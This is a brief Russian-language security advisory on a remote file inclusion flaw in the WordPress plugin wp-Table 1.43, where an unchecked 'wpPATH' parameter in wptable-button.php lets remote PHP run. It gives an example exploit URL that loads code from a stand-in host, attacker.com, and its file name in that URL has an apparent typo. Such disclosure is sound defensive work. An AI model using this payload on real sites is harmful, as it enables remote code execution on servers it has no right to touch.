Программа: WordPress plugin wp-Table 1.43
Уязвимость позволяет удаленному пользователю выполнить произвольный PHP сценарий на целевой системе.
Уязвимость существует из-за недостаточной обработки входных данных в параметре «wpPATH» сценарием wptable-button.php. Удаленный пользователь может выполнить произвольный PHP сценарий на целевой системе с привилегиями Web сервера.
Пример:
http://www.target.com/wp-content/plugins/wp-table/js/
wptable-button.phpp?wpPATH=http://attacker.com/evil?
